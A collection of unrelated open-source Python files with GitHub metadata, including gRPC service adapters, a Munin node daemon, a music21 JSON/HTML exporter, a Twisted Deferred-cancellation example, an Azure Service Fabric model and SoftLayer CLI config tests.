"source": "github",
"line_count": 31,
"max_line_length": 117,
"avg_line_length": 39.67741935483871,
"alnum_prop": 0.6317073170731707,
"repo_name": "ahmadsyarif/Python-AgentIntelligent",
"id": "355866df24e63e98aeaccb91f7515367689c943a",
"size": "1230",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "Command.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "12204"
}
],
"symlink_target": ""
} |
from hypr import Provider, request, filter
import json
class BaseProvider(Provider):
def get(self):
return request.m_filters
class Provider0(BaseProvider):
propagation_rules = {
'rule0': (BaseProvider, '/bar')
}
@filter
def my_filter(self):
return 'ok'
class TestFilter:
providers = {
Provider0: '/foo',
}
def test_sanity(self, app):
with app.test_client() as client:
resp = client.get('/foo')
assert resp.status == 200
assert json.loads(resp.text) == {}
def test_filter_is_applied(self, app):
with app.test_client() as client:
resp = client.get('/foo/bar')
assert resp.status == 200
assert json.loads(resp.text) == {'my_filter': 'ok'}
| {
"content_hash": "d98121e5de458678cb5fa01c8da31097",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 63,
"avg_line_length": 21.157894736842106,
"alnum_prop": 0.5671641791044776,
"repo_name": "project-hypr/hypr",
"id": "2e3c7cd3e88353ac73a3793a88b1537cccf41a8b",
"size": "804",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/security/filters/test_simple_filter.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "144944"
}
],
"symlink_target": ""
} |
"""Behaviors for servicing RPCs."""
# base_interfaces and interfaces are referenced from specification in this
# module.
from grpc.framework.base import interfaces as base_interfaces # pylint: disable=unused-import
from grpc.framework.face import _control
from grpc.framework.face import exceptions
from grpc.framework.face import interfaces # pylint: disable=unused-import
from grpc.framework.foundation import abandonment
from grpc.framework.foundation import callable_util
from grpc.framework.foundation import stream
from grpc.framework.foundation import stream_util
class _ValueInStreamOutConsumer(stream.Consumer):
"""A stream.Consumer that maps inputs one-to-many onto outputs."""
def __init__(self, behavior, context, downstream):
"""Constructor.
Args:
behavior: A callable that takes a single value and an
interfaces.RpcContext and returns a generator of arbitrarily many
values.
context: An interfaces.RpcContext.
downstream: A stream.Consumer to which to pass the values generated by the
given behavior.
"""
self._behavior = behavior
self._context = context
self._downstream = downstream
def consume(self, value):
_control.pipe_iterator_to_consumer(
self._behavior(value, self._context), self._downstream,
self._context.is_active, False)
def terminate(self):
self._downstream.terminate()
def consume_and_terminate(self, value):
_control.pipe_iterator_to_consumer(
self._behavior(value, self._context), self._downstream,
self._context.is_active, True)
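# Illustrative sketch only, not used by the framework: a minimal downstream
# stream.Consumer of the kind _ValueInStreamOutConsumer (and the adapters
# below) write their results to.  Everything in this class is a stand-in
# defined purely for the example.
class _ExampleCollectingConsumer(stream.Consumer):
  """Collects consumed values and records whether termination was signalled."""
  def __init__(self):
    self.values = []
    self.terminated = False
  def consume(self, value):
    self.values.append(value)
  def terminate(self):
    self.terminated = True
  def consume_and_terminate(self, value):
    self.values.append(value)
    self.terminated = True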
def _pool_wrap(behavior, operation_context):
"""Wraps an operation-related behavior so that it may be called in a pool.
Args:
behavior: A callable related to carrying out an operation.
operation_context: A base_interfaces.OperationContext for the operation.
Returns:
A callable that when called carries out the behavior of the given callable
and handles whatever exceptions it raises appropriately.
"""
def translation(*args):
try:
behavior(*args)
except (
abandonment.Abandoned,
exceptions.ExpirationError,
exceptions.CancellationError,
exceptions.ServicedError,
exceptions.NetworkError) as e:
if operation_context.is_active():
operation_context.fail(e)
except Exception as e:
operation_context.fail(e)
return callable_util.with_exceptions_logged(
translation, _control.INTERNAL_ERROR_LOG_MESSAGE)
def adapt_inline_value_in_value_out(method):
def adaptation(response_consumer, operation_context):
rpc_context = _control.RpcContext(operation_context)
return stream_util.TransformingConsumer(
lambda request: method.service(request, rpc_context), response_consumer)
return adaptation
def adapt_inline_value_in_stream_out(method):
def adaptation(response_consumer, operation_context):
rpc_context = _control.RpcContext(operation_context)
return _ValueInStreamOutConsumer(
method.service, rpc_context, response_consumer)
return adaptation
def adapt_inline_stream_in_value_out(method, pool):
def adaptation(response_consumer, operation_context):
rendezvous = _control.Rendezvous()
operation_context.add_termination_callback(rendezvous.set_outcome)
def in_pool_thread():
response_consumer.consume_and_terminate(
method.service(rendezvous, _control.RpcContext(operation_context)))
pool.submit(_pool_wrap(in_pool_thread, operation_context))
return rendezvous
return adaptation
def adapt_inline_stream_in_stream_out(method, pool):
"""Adapts an interfaces.InlineStreamInStreamOutMethod for use with Consumers.
RPCs may be serviced by calling the return value of this function, passing
request values to the stream.Consumer returned from that call, and receiving
response values from the stream.Consumer passed to that call.
Args:
method: An interfaces.InlineStreamInStreamOutMethod.
pool: A thread pool.
Returns:
A callable that takes a stream.Consumer and a
base_interfaces.OperationContext and returns a stream.Consumer.
"""
def adaptation(response_consumer, operation_context):
rendezvous = _control.Rendezvous()
operation_context.add_termination_callback(rendezvous.set_outcome)
def in_pool_thread():
_control.pipe_iterator_to_consumer(
method.service(rendezvous, _control.RpcContext(operation_context)),
response_consumer, operation_context.is_active, True)
pool.submit(_pool_wrap(in_pool_thread, operation_context))
return rendezvous
return adaptation
def adapt_event_value_in_value_out(method):
def adaptation(response_consumer, operation_context):
def on_payload(payload):
method.service(
payload, response_consumer.consume_and_terminate,
_control.RpcContext(operation_context))
return _control.UnaryConsumer(on_payload)
return adaptation
def adapt_event_value_in_stream_out(method):
def adaptation(response_consumer, operation_context):
def on_payload(payload):
method.service(
payload, response_consumer, _control.RpcContext(operation_context))
return _control.UnaryConsumer(on_payload)
return adaptation
def adapt_event_stream_in_value_out(method):
def adaptation(response_consumer, operation_context):
rpc_context = _control.RpcContext(operation_context)
return method.service(response_consumer.consume_and_terminate, rpc_context)
return adaptation
def adapt_event_stream_in_stream_out(method):
def adaptation(response_consumer, operation_context):
return method.service(
response_consumer, _control.RpcContext(operation_context))
return adaptation
| {
"content_hash": "f8287d8dfc0cf9cd5d5718111882f2e3",
"timestamp": "",
"source": "github",
"line_count": 160,
"max_line_length": 94,
"avg_line_length": 35.875,
"alnum_prop": 0.7381533101045297,
"repo_name": "nmittler/grpc",
"id": "26bde129687a5b48b6bb7ad849665b10ab19e722",
"size": "7269",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "src/python/src/grpc/framework/face/_service.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "3067591"
},
{
"name": "C#",
"bytes": "384252"
},
{
"name": "C++",
"bytes": "499254"
},
{
"name": "JavaScript",
"bytes": "135884"
},
{
"name": "Makefile",
"bytes": "1105184"
},
{
"name": "Objective-C",
"bytes": "145264"
},
{
"name": "PHP",
"bytes": "100749"
},
{
"name": "Protocol Buffer",
"bytes": "133189"
},
{
"name": "Python",
"bytes": "649840"
},
{
"name": "Ruby",
"bytes": "291726"
},
{
"name": "Shell",
"bytes": "17838"
}
],
"symlink_target": ""
} |
import os
import socket
import SocketServer
import sys
import threading
import time
from subprocess import Popen, PIPE
PLUGIN_PATH = "/etc/munin/plugins"
def parse_args():
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-p", "--pluginpath", dest="plugin_path",
help="path to plugins", default=PLUGIN_PATH)
(options, args) = parser.parse_args()
return options, args
def execute_plugin(path, cmd=""):
args = [path]
if cmd:
args.append(cmd)
p = Popen(args, stdout=PIPE)
output = p.communicate()[0]
return output
if os.name == 'posix':
def become_daemon(our_home_dir='.', out_log='/dev/null',
err_log='/dev/null', umask=022):
"Robustly turn into a UNIX daemon, running in our_home_dir."
# First fork
try:
if os.fork() > 0:
sys.exit(0) # kill off parent
except OSError, e:
sys.stderr.write("fork #1 failed: (%d) %s\n" % (e.errno, e.strerror))
sys.exit(1)
os.setsid()
os.chdir(our_home_dir)
os.umask(umask)
# Second fork
try:
if os.fork() > 0:
os._exit(0)
except OSError, e:
sys.stderr.write("fork #2 failed: (%d) %s\n" % (e.errno, e.strerror))
os._exit(1)
si = open('/dev/null', 'r')
so = open(out_log, 'a+', 0)
se = open(err_log, 'a+', 0)
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
# Set custom file descriptors so that they get proper buffering.
sys.stdout, sys.stderr = so, se
else:
def become_daemon(our_home_dir='.', out_log=None, err_log=None, umask=022):
"""
If we're not running under a POSIX system, just simulate the daemon
mode by doing redirections and directory changing.
"""
os.chdir(our_home_dir)
os.umask(umask)
sys.stdin.close()
sys.stdout.close()
sys.stderr.close()
if err_log:
sys.stderr = open(err_log, 'a', 0)
else:
sys.stderr = NullDevice()
if out_log:
sys.stdout = open(out_log, 'a', 0)
else:
sys.stdout = NullDevice()
class NullDevice:
"A writeable object that writes to nowhere -- like /dev/null."
def write(self, s):
pass
class MuninRequestHandler(SocketServer.StreamRequestHandler):
def handle(self):
# self.rfile is a file-like object created by the handler;
# we can now use e.g. readline() instead of raw recv() calls
plugins = []
for x in os.listdir(self.server.options.plugin_path):
if x.startswith('.'):
continue
fullpath = os.path.join(self.server.options.plugin_path, x)
if not os.path.isfile(fullpath):
continue
plugins.append(x)
node_name = socket.gethostname().split('.')[0]
self.wfile.write("# munin node at %s\n" % node_name)
while True:
line = self.rfile.readline()
if not line:
break
line = line.strip()
cmd = line.split(' ', 1)
plugin = (len(cmd) > 1) and cmd[1] or None
if cmd[0] == "list":
self.wfile.write("%s\n" % " ".join(plugins))
elif cmd[0] == "nodes":
self.wfile.write("nodes\n%s\n.\n" % (node_name))
elif cmd[0] == "version":
self.wfile.write("munins node on chatter1 version: 1.2.6\n")
elif cmd[0] in ("fetch", "config"):
if plugin not in plugins:
self.wfile.write("# Unknown service\n.\n")
continue
c = (cmd[0] == "config") and "config" or ""
out = execute_plugin(os.path.join(self.server.options.plugin_path, plugin), c)
self.wfile.write(out)
if out and out[-1] != "\n":
self.wfile.write("\n")
self.wfile.write(".\n")
elif cmd[0] == "quit":
break
else:
self.wfile.write("# Unknown command. Try list, nodes, config, fetch, version or quit\n")
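# Hedged sketch, not part of the daemon: a minimal client for the protocol the
# handler above implements (list, nodes, config, fetch, version, quit).  The
# host/port are the defaults from __main__ and the plugin name is an example.
def example_client(host='127.0.0.1', port=4949, plugin='load'):
    s = socket.create_connection((host, port))
    banner = s.recv(4096)              # "# munin node at <hostname>"
    s.sendall('list\n')
    plugins = s.recv(4096)
    s.sendall('fetch %s\n' % plugin)
    values = s.recv(4096)
    s.sendall('quit\n')
    s.close()
    return banner, plugins, values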
class MuninServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
if __name__ == "__main__":
HOST, PORT = "0.0.0.0", 4949
if sys.version_info[:3] >= (2, 6, 0):
server = MuninServer((HOST, PORT), MuninRequestHandler, bind_and_activate=False)
server.allow_reuse_address = True
server.server_bind()
server.server_activate()
else:
server = MuninServer((HOST, PORT), MuninRequestHandler)
ip, port = server.server_address
options, args = parse_args()
options.plugin_path = os.path.abspath(options.plugin_path)
server.options = options
become_daemon()
server.serve_forever()
| {
"content_hash": "a05165fd4d136057fedf84deba29a83c",
"timestamp": "",
"source": "github",
"line_count": 148,
"max_line_length": 104,
"avg_line_length": 34.12837837837838,
"alnum_prop": 0.5394971292813304,
"repo_name": "Mitali-Sodhi/CodeLingo",
"id": "34efcd2fa0d9b2972a31242888b341e72c732be2",
"size": "5074",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "Dataset/python/munin-node.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "9681846"
},
{
"name": "C#",
"bytes": "1741915"
},
{
"name": "C++",
"bytes": "5686017"
},
{
"name": "HTML",
"bytes": "11812193"
},
{
"name": "Java",
"bytes": "11198971"
},
{
"name": "JavaScript",
"bytes": "21693468"
},
{
"name": "M",
"bytes": "61627"
},
{
"name": "Objective-C",
"bytes": "4085820"
},
{
"name": "Perl",
"bytes": "193472"
},
{
"name": "Perl6",
"bytes": "176248"
},
{
"name": "Python",
"bytes": "10296284"
},
{
"name": "Ruby",
"bytes": "1050136"
}
],
"symlink_target": ""
} |
'''
Convert a music21 object into JSON and send it to the browser for music21j to use.
'''
import unittest
from music21.exceptions21 import Music21Exception
from music21 import freezeThaw
from music21 import stream
supportedDisplayModes = [
'html',
'jsbody',
'jsbodyScript',
'json'
]
def fromObject(thisObject, mode='html', local=False):
'''
returns a string of data for a given Music21Object such as a Score, Note, etc. that
can be displayed in a browser using the music21j package. Called by .show('vexflow').
>>> n = note.Note('C#4')
>>> #_DOCS_SHOW print(vexflow.toMusic21j.fromObject(n))
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<!-- for MSIE 10 on Windows 8 -->
<meta http-equiv="X-UA-Compatible" content="requiresActiveX=true"/>
<title>Music21 Fragment</title>
<script data-main='http://web.mit.edu/music21/music21j/src/music21' src='http://web.mit.edu/music21/music21j/ext/require/require.js'></script>
<script>
require(['music21'], function() {
var pickleIn = '{"m21Version": {"py/tuple": [1, 9, 2]}, "stream": {"_mutable": true, "_activeSite": null, "xPosition": null, "' +
'_priority": 0, "_elements": [], "_cache": {}, "definesExplicitPageBreaks": false, "_unlinkedDuration": null, "' +
'id": ..., "_duration": null, "py/object": "music21.stream.Stream", "streamStatus": {"py/object": "music' +
'21.stream.streamStatus.StreamStatus", "_enharmonics": null, "_dirty": null, "_concertPitch": null, "_accidenta' +
'ls": null, "_ties": null, "_rests": null, "_ornaments": null, "_client": null, "_beams": null, "_measures": nu' +
...
'd": null}, "definesExplicitSystemBreaks": false, ...}}';
var jpc = new music21.fromPython.Converter();
streamObj = jpc.run(pickleIn);
streamObj.renderOptions.events.resize = "reflow";
streamObj.appendNewCanvas();
});
</script>
<BLANKLINE>
</head>
<body>
</body>
</html>
'''
conv = VexflowPickler()
conv.mode = mode
conv.useLocal = local
return conv.fromObject(thisObject)
class VexflowPickler(object):
templateHtml = '''<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<!-- for MSIE 10 on Windows 8 -->
<meta http-equiv="X-UA-Compatible" content="requiresActiveX=true"/>
<title>{title}</title>
{loadM21Template}
{jsBodyScript}
</head>
<body>
</body>
</html>
'''
jsBodyScript = '''<script>\n{jsBody}\n</script>'''
jsBody = '''require(['music21'], function() {{
var pickleIn = {pickleOutput};
var jpc = new music21.jsonPickle.Converter();
streamObj = jpc.run(pickleIn);
{callback}
}});'''
loadM21Template = '''<script data-main='{m21URI}' src='{requireURI}'></script>'''
def __init__(self):
self.defaults = {
'pickleOutput' : '{"py/object": "hello"}',
'm21URI' : 'http://web.mit.edu/music21/music21j/src/music21',
'requireURI' :'http://web.mit.edu/music21/music21j/ext/require/require.js',
'callback' :'streamObj.renderOptions.events.resize = "reflow";\n\t\tstreamObj.appendNewCanvas();',
'm21URIlocal' : 'file:///Users/Cuthbert/git/music21j/src/music21',
'requireURIlocal' : 'file:///Users/Cuthbert/git/music21j/ext/require/require.js',
}
self.mode = 'html'
self.useLocal = False
def fromObject(self, thisObject, mode=None):
if mode is None:
mode = self.mode
if (thisObject.isStream is False):
retStream = stream.Stream()
retStream.append(thisObject)
else:
retStream = thisObject
return self.fromStream(retStream, mode=mode)
def splitLongJSON(self, jsonString, chunkSize=110):
allJSONList = []
for i in range(0, len(jsonString), chunkSize):
allJSONList.append('\'' + jsonString[i:i+chunkSize] + '\'')
return ' + \n '.join(allJSONList)
def getLoadTemplate(self, urls=None):
'''
Gets the <script> tag for loading music21 from require.js
>>> vfp = vexflow.toMusic21j.VexflowPickler()
>>> vfp.getLoadTemplate()
"<script data-main='http://web.mit.edu/music21/music21j/src/music21' src='http://web.mit.edu/music21/music21j/ext/require/require.js'></script>"
>>> d = {'m21URI': 'file:///tmp/music21', 'requireURI': 'http://requirejs.com/require.js'}
>>> vfp.getLoadTemplate(d)
"<script data-main='file:///tmp/music21' src='http://requirejs.com/require.js'></script>"
'''
if urls is None:
urls = self.defaults
if self.useLocal is False:
loadM21formatted = self.loadM21Template.format(m21URI = urls['m21URI'],
requireURI = urls['requireURI'],)
else:
loadM21formatted = self.loadM21Template.format(m21URI = urls['m21URIlocal'],
requireURI = urls['requireURIlocal'],)
return loadM21formatted
def getJSBodyScript(self, dataSplit, defaults = None):
'''
Get the <script>...</script> tag to render the JSON
>>> vfp = vexflow.toMusic21j.VexflowPickler()
>>> print(vfp.getJSBodyScript('{"hi": "hello"}'))
<script>
require(['music21'], function() {
var pickleIn = {"hi": "hello"};
var jpc = new music21.jsonPickle.Converter();
streamObj = jpc.run(pickleIn);
streamObj.renderOptions.events.resize = "reflow";
streamObj.appendNewCanvas();
});
</script>
'''
if defaults is None:
defaults = self.defaults
jsBody = self.getJSBody(dataSplit, defaults)
jsBodyScript = self.jsBodyScript.format(jsBody = jsBody)
return jsBodyScript
def getJSBody(self, dataSplit, defaults = None):
'''
Get the javascript code without the <script> tags to render the JSON
>>> vfp = vexflow.toMusic21j.VexflowPickler()
>>> print(vfp.getJSBody('{"hi": "hello"}'))
require(['music21'], function() {
var pickleIn = {"hi": "hello"};
var jpc = new music21.jsonPickle.Converter();
streamObj = jpc.run(pickleIn);
streamObj.renderOptions.events.resize = "reflow";
streamObj.appendNewCanvas();
});
'''
if defaults is None:
d = self.defaults
else:
d = defaults
jsBody = self.jsBody.format(pickleOutput = dataSplit,
callback = d['callback'])
return jsBody
def getHTML(self, dataSplit, title=None, defaults=None):
'''
Get the complete HTML page to pass to the browser:
>>> vfp = vexflow.toMusic21j.VexflowPickler()
>>> print(vfp.getHTML('{"hi": "hello"}', 'myPiece'))
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<!-- for MSIE 10 on Windows 8 -->
<meta http-equiv="X-UA-Compatible" content="requiresActiveX=true"/>
<title>myPiece</title>
<script data-main='http://web.mit.edu/music21/music21j/src/music21' src='http://web.mit.edu/music21/music21j/ext/require/require.js'></script>
<script>
require(['music21'], function() {
var pickleIn = {"hi": "hello"};
var jpc = new music21.jsonPickle.Converter();
streamObj = jpc.run(pickleIn);
streamObj.renderOptions.events.resize = "reflow";
streamObj.appendNewCanvas();
});
</script>
</head>
<body>
</body>
</html>
'''
if defaults is None:
d = self.defaults
else:
d = defaults
loadM21Formatted = self.getLoadTemplate(d)
jsBodyScript = self.getJSBodyScript(dataSplit, d)
formatted = self.templateHtml.format(title = title,
loadM21Template=loadM21Formatted,
jsBodyScript=jsBodyScript)
return formatted
def fromStream(self, thisStream, mode=None):
if mode is None:
mode = self.mode
if (thisStream.metadata is not None and thisStream.metadata.title != ""):
title = thisStream.metadata.title
else:
title = "Music21 Fragment"
sf = freezeThaw.StreamFreezer(thisStream)
## recursive data structures will be expanded up to a high depth -- make sure there are none...
data = sf.writeStr(fmt='jsonpickle')
dataSplit = self.splitLongJSON(data)
if mode == 'json':
return data
elif mode == 'jsonSplit':
return dataSplit
elif mode == 'jsbody':
return self.getJSBody(dataSplit)
elif mode == 'jsbodyScript':
return self.getJSBodyScript(dataSplit)
elif mode == 'html':
return self.getHTML(dataSplit, title)
else:
raise VexflowToM21JException("Cannot deal with mode: %r" % mode)
class VexflowToM21JException(Music21Exception):
pass
class Test(unittest.TestCase):
def runTest(self):
pass
def testDummy(self):
pass
class TestExternal(unittest.TestCase):
def runTest(self):
pass
def testCuthbertLocal(self):
'''
test a local version of this mess...
'''
from music21 import corpus, environment
environLocal = environment.Environment()
s = corpus.parse('luca/gloria').measures(1,19)
#s = corpus.parse('beethoven/opus18no1', 2).parts[0].measures(4,10)
vfp = VexflowPickler()
vfp.defaults['m21URI'] = 'file:///Users/Cuthbert/git/music21j/src/music21'
vfp.defaults['requireURI'] = 'file:///Users/Cuthbert/git/music21j/ext/require/require.js'
data = vfp.fromObject(s)
fp = environLocal.getTempFile('.html')
with open(fp, 'w') as f:
f.write(data)
environLocal.launch('vexflow', fp)
if __name__ == "__main__":
import music21
music21.mainTest(Test)
# from music21 import note, clef, meter
# s = stream.Measure()
# s.insert(0, clef.TrebleClef())
# s.insert(0, meter.TimeSignature('1/4'))
# n = note.Note()
# n.duration.quarterLength = 1/3.
# s.repeatAppend(n, 3)
# p = stream.Part()
# p.repeatAppend(s, 2)
# p.show('vexflow', local=True)
#
#s.show('vexflow')
| {
"content_hash": "d66fb678feec8f03c19f3a93e35d5e22",
"timestamp": "",
"source": "github",
"line_count": 297,
"max_line_length": 154,
"avg_line_length": 39.67003367003367,
"alnum_prop": 0.5576302834832796,
"repo_name": "arnavd96/Cinemiezer",
"id": "6384f3ce95c6ca623403d707e0ffb7f38c308093",
"size": "12314",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "myvenv/lib/python3.4/site-packages/music21/vexflow/toMusic21j.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "300501"
},
{
"name": "C++",
"bytes": "14430"
},
{
"name": "CSS",
"bytes": "105126"
},
{
"name": "FORTRAN",
"bytes": "3200"
},
{
"name": "HTML",
"bytes": "290903"
},
{
"name": "JavaScript",
"bytes": "154747"
},
{
"name": "Jupyter Notebook",
"bytes": "558334"
},
{
"name": "Objective-C",
"bytes": "567"
},
{
"name": "Python",
"bytes": "37092739"
},
{
"name": "Shell",
"bytes": "3668"
},
{
"name": "TeX",
"bytes": "1527"
}
],
"symlink_target": ""
} |
from twisted.internet.defer import Deferred
def send_poem(d):
print('Sending poem')
d.callback('Once upon a midnight dreary')
def get_poem():
"""Return a poem 5 seconds later."""
def canceler(d):
# They don't want the poem anymore, so cancel the delayed call
delayed_call.cancel()
# At this point we have three choices:
# 1. Do nothing, and the deferred will fire the errback
# chain with CancelledError.
# 2. Fire the errback chain with a different error.
# 3. Fire the callback chain with an alternative result.
d = Deferred(canceler)
from twisted.internet import reactor
delayed_call = reactor.callLater(5, send_poem, d)
return d
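# A hedged variation on the canceler above, added for illustration: choice 3,
# where cancellation fires the callback chain with an alternative result
# instead of letting CancelledError reach the errback chain.
def get_poem_or_fallback():
    """Return a poem 5 seconds later, or a stock line if cancelled."""
    def canceler(d):
        delayed_call.cancel()
        d.callback('Quoth the Raven: request cancelled')  # choice 3
    d = Deferred(canceler)
    from twisted.internet import reactor
    delayed_call = reactor.callLater(5, send_poem, d)
    return d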
def got_poem(poem):
print('I got a poem:', poem)
def poem_error(err):
print('get_poem failed:', err)
def main():
from twisted.internet import reactor
reactor.callLater(10, reactor.stop) # stop the reactor in 10 seconds
d = get_poem()
d.addCallbacks(got_poem, poem_error)
reactor.callLater(2, d.cancel) # cancel after 2 seconds
reactor.run()
main()
| {
"content_hash": "26ac964d2123dc2f5867612d4d284931",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 72,
"avg_line_length": 25.044444444444444,
"alnum_prop": 0.6512866015971606,
"repo_name": "jdavisp3/twisted-intro",
"id": "7e88e54cd1f6c8698f6dba58ae2ea668c96716e2",
"size": "1127",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "deferred-cancel/defer-cancel-11.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Erlang",
"bytes": "2523"
},
{
"name": "Haskell",
"bytes": "3262"
},
{
"name": "Makefile",
"bytes": "137"
},
{
"name": "Python",
"bytes": "118095"
},
{
"name": "Shell",
"bytes": "86"
}
],
"symlink_target": ""
} |
from .entity_health_state import EntityHealthState
class ReplicaHealthState(EntityHealthState):
"""Represents a base class for stateful service replica or stateless service
instance health state.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: StatefulServiceReplicaHealthState,
StatelessServiceInstanceHealthState
:param aggregated_health_state: The health state of a Service Fabric
entity such as Cluster, Node, Application, Service, Partition, Replica
etc. Possible values include: 'Invalid', 'Ok', 'Warning', 'Error',
'Unknown'
:type aggregated_health_state: str or
~azure.servicefabric.models.HealthState
:param partition_id: The ID of the partition to which this replica
belongs.
:type partition_id: str
:param service_kind: Constant filled by server.
:type service_kind: str
"""
_validation = {
'service_kind': {'required': True},
}
_attribute_map = {
'aggregated_health_state': {'key': 'AggregatedHealthState', 'type': 'str'},
'partition_id': {'key': 'PartitionId', 'type': 'str'},
'service_kind': {'key': 'ServiceKind', 'type': 'str'},
}
_subtype_map = {
'service_kind': {'Stateful': 'StatefulServiceReplicaHealthState', 'Stateless': 'StatelessServiceInstanceHealthState'}
}
def __init__(self, aggregated_health_state=None, partition_id=None):
super(ReplicaHealthState, self).__init__(aggregated_health_state=aggregated_health_state)
self.partition_id = partition_id
self.service_kind = None
self.service_kind = 'ReplicaHealthState'
| {
"content_hash": "4ec35d4a64f6cb541618cfea89fd32f5",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 125,
"avg_line_length": 38.7906976744186,
"alnum_prop": 0.684052757793765,
"repo_name": "lmazuel/azure-sdk-for-python",
"id": "894b4bc3c12de48a13694ae68d608b8744df4ea1",
"size": "2142",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "azure-servicefabric/azure/servicefabric/models/replica_health_state.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "42572767"
}
],
"symlink_target": ""
} |
"""
SoftLayer.tests.CLI.modules.config_tests
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:license: MIT, see LICENSE for more details.
"""
import json
import tempfile
import mock
import SoftLayer
from SoftLayer import auth
from SoftLayer.CLI.config import setup as config
from SoftLayer.CLI import exceptions
from SoftLayer import consts
from SoftLayer import testing
from SoftLayer import transports
class TestHelpShow(testing.TestCase):
def set_up(self):
transport = transports.XmlRpcTransport(
endpoint_url='http://endpoint-url',
)
self.env.client = SoftLayer.BaseClient(
transport=transport,
auth=auth.BasicAuthentication('username', 'api-key'))
def test_show(self):
result = self.run_command(['config', 'show'])
self.assertEqual(result.exit_code, 0)
self.assertEqual(json.loads(result.output),
{'Username': 'username',
'API Key': 'api-key',
'Endpoint URL': 'http://endpoint-url',
'Timeout': 'not set'})
class TestHelpSetup(testing.TestCase):
def set_up(self):
super(TestHelpSetup, self).set_up()
# NOTE(kmcdonald): since the endpoint_url is changed with the client
# in these commands, we need to ensure that a fixtured transport is
# used.
transport = testing.MockableTransport(SoftLayer.FixtureTransport())
self.env.client = SoftLayer.BaseClient(transport=transport)
@mock.patch('SoftLayer.CLI.formatting.confirm')
@mock.patch('SoftLayer.CLI.environment.Environment.getpass')
@mock.patch('SoftLayer.CLI.environment.Environment.input')
def test_setup(self, input, getpass, confirm_mock):
with tempfile.NamedTemporaryFile() as config_file:
confirm_mock.return_value = True
getpass.return_value = 'A' * 64
input.side_effect = ['user', 'public', 0]
result = self.run_command(['--config=%s' % config_file.name,
'config', 'setup'])
self.assertEqual(result.exit_code, 0)
self.assertTrue('Configuration Updated Successfully'
in result.output)
contents = config_file.read().decode("utf-8")
self.assertTrue('[softlayer]' in contents)
self.assertTrue('username = user' in contents)
self.assertTrue('api_key = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in contents)
self.assertTrue('endpoint_url = %s' % consts.API_PUBLIC_ENDPOINT
in contents)
@mock.patch('SoftLayer.CLI.formatting.confirm')
@mock.patch('SoftLayer.CLI.environment.Environment.getpass')
@mock.patch('SoftLayer.CLI.environment.Environment.input')
def test_setup_cancel(self, input, getpass, confirm_mock):
with tempfile.NamedTemporaryFile() as config_file:
confirm_mock.return_value = False
getpass.return_value = 'A' * 64
input.side_effect = ['user', 'public', 0]
result = self.run_command(['--config=%s' % config_file.name,
'config', 'setup'])
self.assertEqual(result.exit_code, 2)
self.assertIsInstance(result.exception, exceptions.CLIAbort)
@mock.patch('SoftLayer.CLI.environment.Environment.getpass')
@mock.patch('SoftLayer.CLI.environment.Environment.input')
def test_get_user_input_private(self, input, getpass):
getpass.return_value = 'A' * 64
input.side_effect = ['user', 'private', 0]
username, secret, endpoint_url, timeout = (
config.get_user_input(self.env))
self.assertEqual(username, 'user')
self.assertEqual(secret, 'A' * 64)
self.assertEqual(endpoint_url, consts.API_PRIVATE_ENDPOINT)
@mock.patch('SoftLayer.CLI.environment.Environment.getpass')
@mock.patch('SoftLayer.CLI.environment.Environment.input')
def test_get_user_input_custom(self, input, getpass):
getpass.return_value = 'A' * 64
input.side_effect = ['user', 'custom', 'custom-endpoint', 0]
_, _, endpoint_url, _ = config.get_user_input(self.env)
self.assertEqual(endpoint_url, 'custom-endpoint')
@mock.patch('SoftLayer.CLI.environment.Environment.getpass')
@mock.patch('SoftLayer.CLI.environment.Environment.input')
def test_get_user_input_default(self, input, getpass):
self.env.getpass.return_value = 'A' * 64
self.env.input.side_effect = ['user', 'public', 0]
_, _, endpoint_url, _ = config.get_user_input(self.env)
self.assertEqual(endpoint_url, consts.API_PUBLIC_ENDPOINT)
| {
"content_hash": "294f7950df4602db0cc45f052c704a67",
"timestamp": "",
"source": "github",
"line_count": 122,
"max_line_length": 76,
"avg_line_length": 39.33606557377049,
"alnum_prop": 0.6217962075432382,
"repo_name": "iftekeriba/softlayer-python",
"id": "db0ed6b8a58668d1dace482d5688d9eda292ec56",
"size": "4799",
